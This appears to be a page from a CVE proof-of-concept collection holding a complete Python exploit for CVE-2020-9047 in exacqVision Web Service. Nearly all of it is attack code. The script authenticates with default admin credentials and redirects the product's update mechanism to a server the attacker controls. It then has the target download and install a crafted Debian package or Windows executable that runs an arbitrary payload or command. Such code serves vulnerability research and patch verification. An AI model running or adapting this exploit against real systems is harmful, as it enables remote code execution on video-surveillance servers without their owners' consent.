4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2020-9047.py PY
# Exploit Title: exacqVision Web Service 3.8.2.67295 - 20.06.3.0 - Remote Code Execution
# Date: 2020-07-13
# Exploit Author: Michael W. Norris
# Technical Details: https://mnorris.io/research/CVE-2020-9047/
# Vendor Homepage: https://www.exacq.com/
# Software Link: https://www.exacq.com/support/downloads.php
# Tested On: exacqVision Web Service 3.8.2.67295 - 20.06.3.0
# CVE: CVE-2020-9047
# Source PoC: https://github.com/norrismw/CVE-2020-9047

#!/usr/bin/python3

import argparse, hashlib, http.server, json, os ,requests, shutil, socketserver, subprocess, sys, tempfile, threading, time

description = 'Exploit for exacqVision Web Service as outlined in CVE-2020-9047. This program targets Windows and Linux x86 installations '
description += 'of exacqVision Web Service versions 3.8.2.67295 - 20.06.3.0. Written by Michael W. Norris.'
parser = argparse.ArgumentParser(description=description)
help_arg = 'The target operating system. Provide "WINDOWS" for Windows, "LINUX" for Linux, or "CHECK" to have this program perform a check. '
help_arg+= 'When using "CHECK", \'\' can be provided for the LHOST and PAYLOAD arguments.'
parser.add_argument('TARGET', choices={'WINDOWS', 'LINUX', 'CHECK'}, help=help_arg)
parser.add_argument('RHOST', help='The IP address of the remote host; the IP address of the target.')
help_arg = 'The port on the remote host where exacqVision Web Service is running. Default: 80'
parser.add_argument('-p', metavar='RPORT', type=int, default=80, help=help_arg)
help_arg = 'The local IP address that will serve the payload for the remote host. This should not be "localhost" or "127.0.0.1". '
help_arg += 'The remote host will need to be able to connect to the provided IP address. This program should be run on the system with '
help_arg += 'the specified IP address.'
parser.add_argument('LHOST', help=help_arg)
help_arg = 'The local port that will be used to serve the payload file for the remote host. Default: 8000'
parser.add_argument('-s', metavar='LPORT', type=int, default=8000, help=help_arg)
help_arg = 'The absolute file path of an existing Windows executable (.exe) or Linux binary file on the local system. The binary will be '
help_arg += 'executed on the remote host. If the --command flag is set and "LINUX" was provided as the TARGET argument, enter a command '
help_arg += 'that will be executed on the remote host.'
parser.add_argument('PAYLOAD', help=help_arg)
help_arg = 'Sets the command flag. The flag allows for a command to be provided as the PAYLOAD argument instead of a file path to a binary. '
help_arg += ' The provided command will be executed on the remote host. The flag should be set only if "LINUX" was provided as the TARGET '
help_arg += 'argument.'
parser.add_argument('--command', default=False, action='store_true', help=help_arg)
help_arg = 'The local existing directory where a randomly named temporary directory will be created. Default: /tmp'
parser.add_argument('-d', metavar='WEBDIR', default='/tmp', help=help_arg)
help_arg = 'The username for authenticating to the remote exacqVision Web Service application. Default: admin'
parser.add_argument('-U', metavar='USERNAME', default='admin', help=help_arg)
help_arg = 'The password for authenticating to the remote exacqVision Web Service application. Default: admin256'
parser.add_argument('-P', metavar='PASSWORD', default='admin256', help=help_arg)
args = parser.parse_args()

system = args.TARGET
rhost = args.RHOST
rport = args.p
lhost = args.LHOST
lport = args.s
payload = args.PAYLOAD
command_flag = args.command
temp_dir = tempfile.mkdtemp(dir = args.d)
username = args.U
password = args.P


class GenPayload:

    random_infofile = next(tempfile._get_candidate_names())
    random_payload = next(tempfile._get_candidate_names()).replace('_',  '')
    server_url = 'http://%s:%s/%s' % (lhost, lport, random_infofile)

    def __init__(self):
        if system == 'LINUX':
            self.package_dir ='/'+self.random_payload
            self.debian_dir = '/DEBIAN'
            os.makedirs(temp_dir+self.package_dir+self.debian_dir)
            if not command_flag:
                self.ptmp_dir = '/tmp'
                os.makedirs(temp_dir+self.package_dir+self.ptmp_dir)
        if system == 'WINDOWS' and command_flag:
            parser.print_help()
            sys.exit()

    def copy_payload(self):
        if system == 'LINUX' and not command_flag:
            shutil.copyfile(payload, temp_dir+self.package_dir+self.ptmp_dir+'/'+self.random_payload)
        else:
            shutil.copyfile(payload, temp_dir+'/'+self.random_payload+'.exe')

    def generate_control(self):
        file_path = temp_dir+self.package_dir+self.debian_dir
        content = 'Package: {random}\nVersion: 99.99.99.9999\nArchitecture: all\n'
        content += 'Maintainer: {random}\nDescription: {random}\n'
        content = content.format(random = self.random_payload)
        control = open(file_path+'/control','w')
        control.write(content)
        control.close()

    def generate_postinst(self):
        file_path = temp_dir+self.package_dir+self.debian_dir
        if command_flag:
            content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n'
            content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n'
            content += '%s &' % (payload)
        else:
            content = '#!/bin/bash\nservice webservice start\nservice evapache restart\n'
            content += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n'
            content += 'chmod 2755 /tmp/{random} && /tmp/{random} &'
            content = content.format(random = self.random_payload)
        postinst = open(file_path+'/postinst','w')
        postinst.write(content)
        postinst.close()
        os.chmod(file_path+'/postinst', 0o0755)

    def build_package(self):
        file_path = temp_dir+self.package_dir
        f_null = open(os.devnull, 'w')
        try:
            subprocess.run(['/usr/bin/dpkg-deb', '-Zgzip', '--build', '%s' % file_path], stdout=f_null)
        except FileNotFoundError:
            print('Just kidding. It appears that /usr/bin/dpkg-deb is not available on this system')
            GenPayload.cleanup(temp_dir)
            sys.exit()
        shutil.rmtree(temp_dir+self.package_dir)

    def package_md5sum(self):
        target_file = open(self, 'rb')
        content = target_file.read()
        md5_hash = hashlib.md5()
        md5_hash.update(content)
        digest = md5_hash.hexdigest()
        return digest

    def generate_fileinfo(self):
        if system == 'LINUX':
            sys = 'Linux'
            ext = 'deb'
            f = self.random_payload+'.deb'
            target_file = (temp_dir+'/'+self.random_payload+'.deb')
        else:
            sys = 'Windows'
            ext = 'exe'
            f = self.random_payload+'.exe'
            target_file = (temp_dir+'/'+self.random_payload+'.exe')
        md5sum = GenPayload.package_md5sum(target_file)
        info_file = (temp_dir+'/'+ self.random_infofile)
        content = "[ev-WebService-{os}-x64-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
        content += "Link=http://{lh}:{lp}/{file}\nPackage={os}-x64\nProduct=webservice\n"
        content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n\n"
        content += "[ev-WebService-{os}-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
        content += "Link=http://{lh}:{lp}/{file}\nPackage={os}\nProduct=webservice\n"
        content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n"
        content = content.format(os = sys, lh = lhost, lp = lport, file = f, fs = os.path.getsize(target_file), md5 = md5sum, ext = ext)
        file_info = open(info_file,'w')
        file_info.write(content)
        file_info.close()
        return self.random_infofile

    def cleanup(self):
        print('\nRemoving temporary directory structure %s' % temp_dir)
        shutil.rmtree(temp_dir)
        print('Stopping HTTP server on 0.0.0.0:%s' % lport)
        time.sleep(1)


class InteractRemote:

    vuln_versions = ['3.10.4.72058', '3.12.4.76544', '3.8.2.67295', '7.0.2.81005', '7.2.7.86974', '7.4.3.89785', '7.6.4.94391']
    vuln_versions += ['7.8.2.97826', '8.0.6.105408', '8.2.2.107285', '8.4.3.111614', '8.6.3.116175', '8.8.1.118913', '9.0.3.124620' ]
    vuln_versions += ['9.2.0.127940', '9.4.3.137684', '9.6.7.145949', '9.8.4.149166', '19.03.3.152166', '19.06.4.157118']
    vuln_versions += ['19.09.4.0', '19.12.2.0', '20.03.2.0', '20.06.3.0']

    def __init__(self):
        self.target = '%s:%s' % (rhost, rport)
        self.http_target = 'http://'+self.target
        self.server_url = GenPayload.server_url
        self.default_url = 'http://www.exacq.com/downloads/evFileInfo.txt'

    def vuln_check(self):
        try:
            version = requests.get(self.http_target+'/version.web').text
            time.sleep(1)
        except (ConnectionRefusedError, OSError, TimeoutError):
            print('Failed to connect to the target: %s' % self.target)
            print('Is the target correct?')
            sys.exit()
        if version in self.vuln_versions[7:]:
            target_info = requests.get(self.http_target+'/health.web')
            json_info = json.loads(target_info.text)
            tar_system = json_info['os']['system']
            processor = json_info['os']['processor']
            print('Target OS: %s %s' % (tar_system, processor))
            print('EVWS Version: %s\n' % version)
            if tar_system.lower() == 'linux' or tar_system.lower() == 'windows':
                if system == 'CHECK':
                    print('Exploitable: YES')
                    print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
                    return True
                try:
                    if system == tar_system.upper():
                        print('Exploitable: YES')
                        if system == 'LINUX' and not command_flag:  
                            print('Confirm the specified PAYLOAD is compatible with the remote architecture')
                        else:
                            print('The provided command will be executed on the remote system')
                        cont_var = input('Press ENTER to continue or CTRL+C to exit\n')
                        if cont_var == '':
                            return True
                        else:
                            sys.exit()
                    else:
                        print('Eploitable: YES')
                        print('... but the provided TARGET argument does not match the remote operating system')
                        print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
                        sys.exit()
                except KeyboardInterrupt:
                    print('')
                    sys.exit()
        if version in self.vuln_versions[:7]:
            print('Target OS: Unable to automatically determine target OS/architecture')
            print('EVWS Version: %s\n' % version)
            if system == 'CHECK':
                print('Exploitable: UNKNOWN')
                print('Manually determine the operating system/architecture of the remote system')
                return True
            try:
                print('Exploitable: YES')
                if system == 'LINUX' and command_flag:
                    print('... but only if the provided TARGET argument is accurate\n')
                print('... but only if the provided TARGET and PAYLOAD arguments are accurate/relevant')
                cont_var = input('Press ENTER to try or CTRL+C to exit\n')
                if cont_var == '':
                    return True
                else:
                    sys.exit()
            except KeyboardInterrupt:
                    print('')
                    sys.exit()
        else:
            print('Exploitable: NO')
            print('Target %s is not vulnerable and/or this program will not work on the target.'  % self.target)
            sys.exit()

    def authenticate(self):
        auth_check = requests.post(self.http_target+'/service.web', data = {'action':'login', 'u':username, 'p':password})
        result = json.loads(auth_check.text)['success']
        time.sleep(1)
        if result:
            auth_token = json.loads(auth_check.text)['auth']
            return auth_token
        else:
            print('Failed to authenticate due to invalid credentials')
            sys.exit()

    def change_url(self, auth_token, default=False):
        if not default:
            req_data = {'auth':auth_token, 'url':self.server_url, 'timeout':'10'}
            change_update = requests.post(self.http_target+'/service.web/updates', data = req_data)
        else:
            req_data = {'auth':auth_token, 'url':self.default_url, 'timeout':'10'}
            change_update = requests.post(self.http_target+'/service.web/updates', data = req_data)
        result = json.loads(change_update.text)['success']
        time.sleep(2)
        return result

    def check_updates(self, auth_token):
        update_check = requests.get(self.http_target+'/service.web?auth=%s&action=updatecheck&updates_file=%s' % (auth_token, self.server_url))
        time.sleep(2)

    def download_update(self, auth_token):
        req_data = {'auth':auth_token, 'action':'downloadupdate', 'version':'99.99.99.9999'}
        download = requests.post(self.http_target+'/service.web', data = req_data)
        status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token))
        time.sleep(2)
        status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token))
        while json.loads(status.text)['current_file_size'] != json.loads(status.text)['total_file_size']:
            print('\nWaiting for download to complete.')
            time.sleep(1)
            status = requests.get(self.http_target+'/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token))
        req_data = {'auth':auth_token, 'action':'update', 'version':'99.99.99.9999'}
        update = requests.post(self.http_target+'/service.web', data = req_data)
        result = json.loads(update.text)['success']
        if result:
            return True
        else:
            print('\nThe target was unable to download the payload from %s' % self.server_url)
            GenPayload.cleanup(temp_dir)
            sys.exit()

    def temporary_server(self):
        print('Starting HTTP server on 0.0.0.0:%s' % lport)
        print('Serving payload from %s directory\n' % temp_dir)
        handler = http.server.SimpleHTTPRequestHandler
        os.chdir(temp_dir)
        httpd = socketserver.TCPServer(('', lport), handler)
        httpd.serve_forever()

    def server_thread(self):
        server_thread = threading.Thread(target=self.temporary_server)
        server_thread.daemon = True
        server_thread.start()
        time.sleep(1)

if __name__ == '__main__':
    w = InteractRemote()
    x = GenPayload()
    if system == 'CHECK':
        w.vuln_check()
        sys.exit()
    else:
        y = w.vuln_check()
        z = w.authenticate()
        if system == 'LINUX':
            x.generate_control()
            if not command_flag:
                x.copy_payload()
            x.generate_postinst()
            x.build_package()
        else:
            x.copy_payload()
        x.generate_fileinfo()
        w.server_thread()
        if y in InteractRemote.vuln_versions[7:]:
            w.change_url(z)
            w.check_updates(z)
            w.change_url(z, default=True)
            w.download_update(z)
        else:
            w.check_updates(z)
            w.download_update(z)
    x.cleanup()
    sys.exit()